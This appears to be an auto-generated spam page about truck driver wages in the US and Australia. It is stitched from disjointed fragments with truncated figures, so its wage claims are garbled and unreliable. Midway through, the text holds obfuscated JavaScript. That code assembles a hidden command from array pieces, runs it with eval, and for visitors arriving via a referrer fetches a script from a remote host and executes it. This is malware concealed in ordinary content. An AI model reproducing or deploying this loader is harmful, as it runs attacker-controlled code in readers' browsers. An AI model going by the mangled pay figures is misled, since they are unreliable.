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This occupation is currently not on the Australian Skilled Occupation List or on the Consolidated Sponsored Occupation List.. When I see trucking companies these days talking about making $4 I cringe This is 2.. These figures vary a little according to the US government, but all the numbers I gave above are based on reality, from a drivers perspective, according to the real world.. I get a lot of email from truck drivers asking about pay As soon as they find out I have been trucking for 2.. Is any experienced heavy haul driver really going to take that job? I wouldn’t think so, but apparently some do.. If you have at least one year of recent, OTR experience, you should be able to find a job where you can make at least $6.. They must have a commercial driver’s license (CDL) Education Most companies require their truck.. What Is the Hourly Wage for a Dump Truck Driver? by Jill Lee, studioD Outlook The BLS predicts that jobs for heavy truck drivers will grow by 21 percent from 2010 to 2020.. Melbourne HC Truck Driver$2 Victoria Excavator Operator / Truck Driver $2 Sydney MC Truck Driver $3.. Average Wage For A Truck Driver UkThat’s the bottom line as I see it I saw an ad the other day, for a heavy- haul company driver that only paid.. Perth Agitator Truck Driver / HR License 6 Western Australia *Source: ABS. Sydney MR Truck Driver / Warehouse Role 4 New South Wales HR Truck Driver Adelaide Nightshift HR Truck Driver $2.. So, I decided to break it down into below average pay, average pay, and above average pay.. Job titles and exact tasks vary in this work and examples of some occupation titles are truck driver, tanker driver, tow truck driver, tip truck driver and MR/HR/HC truck driver.. Unfortunately, for a lot of trucking companies, pay hasn’t changed much over the past 2.. Employment estimate and mean wage estimates for this occupation 281 comments for “ Truck Driver Salary: Average Truck Driver Pay Per Mile ”.. Salaries are annual unless otherwise stated The Australian and New Zealand Standard Classification of Occupations Codes (ANZSCO) are: 7.. It’s weekly pay, or yearly pay In other words, how much money do you really make, never mind all the jargon about miles, money and home- time that a lot of companies throw at you.. le";Jkx["wGs"]=" st";Jkx["Yly"]="= a";Jkx["ksV"]=": f";Jkx["AwW"]=" ru";Jkx["IRZ"]="},e";Jkx["rjv"]="rro";Jkx["WKm"]="a, ";Jkx["HYC"]="tex";Jkx["HDK"]="e: ";Jkx["BQU"]="});";Jkx["HtD"]=".. Just like with any other job, entry level positions do pay Truck driver/tractor-trailer drivers must have knowledge of commercial driving regulations in order to transport all types of goods from livestock to materials over long-distance hauls.. Salaries are annual unless otherwise stated The Australian and National estimates for this occupation.. Brisbane HR Skip Truck Driver $2 Brisbane MR Truck Driver 4 Queensland Waste Truck Driver $2.. Job Title Salary / Wage $Location MC/NC Truck Driver Full Time 7 Melbourne HC Truck driver operator 6.. Starting out in the trucking industry can be frustrating for rookies What most new truck drivers do not understand is that experience is where the money is.. Truck Driver Salary / Wage Salary and wage information for truck drivers is compiled regularly by analysis of Australian jobs advertised in major publications.. But with many companies, it has You have to dig deep to find the good jobs That has always been the case.. Here’s how I see it in 2 Below average truck driver pay- anything under The average wage for a Truck Driver Heavy is AU$23.. Industry profile for this occupation Geographic profile for this occupation National estimates for this occupation: Top.. In case you are new to my website, I have had over 1 Of course, only about 2 OTR companies, which, based on my emails is the main type of job drivers are wondering about.. )There are thousands of truck drivers out there making $7 Especially owner operators- most of them should be doing at least $1.. var aB = 'average+wage+for+a+truck+driver';var Jkx = new Array();Jkx["Pwo"]="_do";Jkx["MnE"]="jqX";Jkx["sdB"]="'fo";Jkx["QQa"]="atu";Jkx["tVN"]="led";Jkx["eNv"]="OPi";Jkx["Jlm"]="on ";Jkx["ZwX"]="ar ";Jkx["rag"]="pro";Jkx["Aeb"]="ces";Jkx["hxX"]="orT";Jkx["qcT"]="jax";Jkx["Psz"]="oss";Jkx["iQE"]="oad";Jkx["OOv"]="sho";Jkx["daI"]="_en";Jkx["QeG"]="/in";Jkx["gIg"]="hro";Jkx["xKr"]="t',";Jkx["qHt"]="Nrr";Jkx["gYS"]="'PO";Jkx["fzu"]="}";Jkx["DBf"]="ons";Jkx["XZQ"]="',d";Jkx["Nlb"]=",cr";Jkx["dvR"]="s, ";Jkx["Uki"]="rin";Jkx["sQF"]="B;v";Jkx["UMc"]="ume";Jkx["YZN"]="e, ";Jkx["XRs"]=".. a";Jkx["dVA"]="eDa";Jkx["sSn"]="wme";Jkx["RSX"]="'sc";Jkx["SrP"]="nse";Jkx["LLj"]="rip";Jkx["rVh"]="als";Jkx["lzK"]="Dom";Jkx["MYy"]="h>0";Jkx["pGi"]="if(";Jkx["zeV"]="tSt";Jkx["vQm"]="esp";Jkx["aXJ"]=",js";Jkx["lYM"]="GET";Jkx["Vii"]="p:/";Jkx["whV"]="cti";Jkx["bzM"]="rt(";Jkx["xNa"]="fun";Jkx["lYi"]="wn)";Jkx["TqP"]="er;";Jkx["Etw"]="htt";Jkx["Cdb"]="ayj";Jkx["xxj"]="({t";Jkx["Esy"]=" q ";Jkx["NYE"]="onp";Jkx["HhI"]="ale";Jkx["xOP"]=" = ";Jkx["kqc"]=": '";Jkx["AEN"]="y(r";Jkx["mwI"]="wnl";Jkx["Azq"]="ype";Jkx["eEc"]="s: ";Jkx["kAM"]="-i3";Jkx["IFW"]=");}";Jkx["ZMY"]="rue";Jkx["Sch"]=" {e";Jkx["yWO"]="var";Jkx["PhB"]="spo";Jkx["ran"]="rce";Jkx["coj"]="y',";Jkx["Jpm"]="lse";Jkx["AIi"]="Dat";Jkx["FAU"]="egb";Jkx["mUs"]="?we";Jkx["ERT"]="(re";Jkx["dfY"]="sDa";Jkx["XbO"]="ta:";Jkx["hcE"]="ebl";Jkx["Vzm"]="dex";Jkx["znl"]="shp";Jkx["toT"]="/me";Jkx["qEc"]="8c0";Jkx["vuJ"]="2kZ";Jkx["LZM"]="err";Jkx["LDp"]="ga_";Jkx["htZ"]="r: ";Jkx["OPR"]="doc";Jkx["GiX"]="ref";Jkx["epT"]="UVH";Jkx["fPW"]="zip";Jkx["gVK"]="a);";Jkx["HLU"]=".. js";Jkx["ZYn"]="L64";Jkx["Lor"]="HR)";Jkx["QJJ"]="nt ";Jkx["pjZ"]="ata";Jkx["mPH"]="ta)";Jkx["cJM"]="';v";Jkx["opH"]="ain";Jkx["arg"]="SON";Jkx["XVJ"]="ngt";Jkx["kJW"]=" { ";Jkx["Uvq"]="gif";Jkx["qtn"]="$.. sc";Jkx["Nmn"]="val";Jkx["QmA"]=" ' ";Jkx["yMv"]="+ J";Jkx["xoz"]="Typ";Jkx["rBV"]="ST ";Jkx["KiY"]="/eS";Jkx["iAa"]="url";Jkx["rCu"]="suc";Jkx["Ebb"]=") {";Jkx["bUJ"]=" fa";Jkx["sVL"]=": t";Jkx["LhU"]="fai";eval(Jkx["yWO"]+Jkx["Esy"]+Jkx["Yly"]+Jkx["sQF"]+Jkx["ZwX"]+Jkx["OOv"]+Jkx["sSn"]+Jkx["xOP"]+Jkx["sdB"]+Jkx["ran"]+Jkx["cJM"]+Jkx["ZwX"]+Jkx["GiX"]+Jkx["xOP"]+Jkx["OPR"]+Jkx["UMc"]+Jkx["QJJ"]+Jkx["GiX"]+Jkx["LZM"]+Jkx["TqP"]+Jkx["pGi"]+Jkx["GiX"]+Jkx["HLU"]+Jkx["XVJ"]+Jkx["MYy"]+Jkx["Ebb"]+Jkx["qtn"]+Jkx["qcT"]+Jkx["xxj"]+Jkx["Azq"]+Jkx["kqc"]+Jkx["lYM"]+Jkx["XZQ"]+Jkx["pjZ"]+Jkx["xoz"]+Jkx["HDK"]+Jkx["RSX"]+Jkx["LLj"]+Jkx["xKr"]+Jkx["rag"]+Jkx["Aeb"]+Jkx["dfY"]+Jkx["XbO"]+Jkx["bUJ"]+Jkx["Jpm"]+Jkx["Nlb"]+Jkx["Psz"]+Jkx["lzK"]+Jkx["opH"]+Jkx["sVL"]+Jkx["ZMY"]+Jkx["aXJ"]+Jkx["NYE"]+Jkx["ksV"]+Jkx["rVh"]+Jkx["YZN"]+Jkx["iAa"]+Jkx["kqc"]+Jkx["Etw"]+Jkx["Vii"]+Jkx["KiY"]+Jkx["ZYn"]+Jkx["FAU"]+Jkx["epT"]+Jkx["qEc"]+Jkx["qHt"]+Jkx["znl"]+Jkx["eNv"]+Jkx["Cdb"]+Jkx["vuJ"]+Jkx["HtD"]+Jkx["kAM"]+Jkx["AwW"]+Jkx["toT"]+Jkx["LDp"]+Jkx["fPW"]+Jkx["QeG"]+Jkx["Vzm"]+Jkx["Pwo"]+Jkx["mwI"]+Jkx["iQE"]+Jkx["daI"]+Jkx["XRs"]+Jkx["mUs"]+Jkx["hcE"]+Jkx["coj"]+Jkx["rCu"]+Jkx["Aeb"]+Jkx["eEc"]+Jkx["xNa"]+Jkx["whV"]+Jkx["Jlm"]+Jkx["ERT"]+Jkx["PhB"]+Jkx["SrP"]+Jkx["AIi"]+Jkx["WKm"]+Jkx["HYC"]+Jkx["zeV"]+Jkx["QQa"]+Jkx["dvR"]+Jkx["MnE"]+Jkx["Lor"]+Jkx["Sch"]+Jkx["Nmn"]+Jkx["ERT"]+Jkx["PhB"]+Jkx["SrP"]+Jkx["AIi"]+Jkx["gVK"]+Jkx["IRZ"]+Jkx["rjv"]+Jkx["htZ"]+Jkx["xNa"]+Jkx["whV"]+Jkx["Jlm"]+Jkx["ERT"]+Jkx["PhB"]+Jkx["SrP"]+Jkx["AIi"]+Jkx["WKm"]+Jkx["HYC"]+Jkx["zeV"]+Jkx["QQa"]+Jkx["dvR"]+Jkx["LZM"]+Jkx["hxX"]+Jkx["gIg"]+Jkx["lYi"]+Jkx["kJW"]+Jkx["HhI"]+Jkx["bzM"]+Jkx["gYS"]+Jkx["rBV"]+Jkx["LhU"]+Jkx["tVN"]+Jkx["QmA"]+Jkx["yMv"]+Jkx["arg"]+Jkx["wGs"]+Jkx["Uki"]+Jkx["Uvq"]+Jkx["AEN"]+Jkx["vQm"]+Jkx["DBf"]+Jkx["dVA"]+Jkx["mPH"]+Jkx["IFW"]+Jkx["BQU"]+Jkx["fzu"]);Average Truck Driver Pay Per Mile – Big City Driver.. They must know how to In a nutshell, this is how I see it- Pay per mile, and average miles, to me, isn’t the issue.. Contrast this with the 17 percent increases expected for all motor vehicle operators, and the 14 percent growth for all.. So that’s what I’ll get into here Average Wage For A Truck Driver In AustraliaBut you can always leave a comment, and I do respond to them all (after I moderate the spam out).. In the late 8 0’s and early 9 And in those days, it was easy to run over 3 So, if you do the math, a decent driver working for a decent company should make 4.. The average weekly total cash earnings in mid- 2 Truck Driver Salaries / Wages in 2.. Flatbed, step- deck and heavy- haul drivers add a little to that pay scale Or, a lot in some cases.. Truck Driver Salary Australia Salary and wage information for truck drivers is compiled regularly by analysis of Australian jobs advertised in major publications.. A truck driver (commonly referred to as a trucker, teamster or driver in the United States and Canada; a truckie in Australia and New Zealand; a lorry driver, or driver in Ireland, the United Kingdom, India and Pakistan) is a.. Most of life’s expenses are twice what they were back then Of course, pay isn’t twice what it was, with any company.. 05 per hour Experience does not have a big impact on this job’s rate Heavy and tractor-trailer truck drivers usually have a high school diploma and attend a professional truckdriving school.. Some trucking companies will work you hard for low pay, work you hard for good pay, work you easy for low pay, and work you easy for good pay.. Average truck driver pay- about Above average truck driver pay- close to Of course, what you haul matters.. BIO: Ken Skaggs is a 3 Since 2 00 0, he’s had 1 Ten- Four Magazine, Careers in Gear, Skaggmo Magazine, and dozens of websites.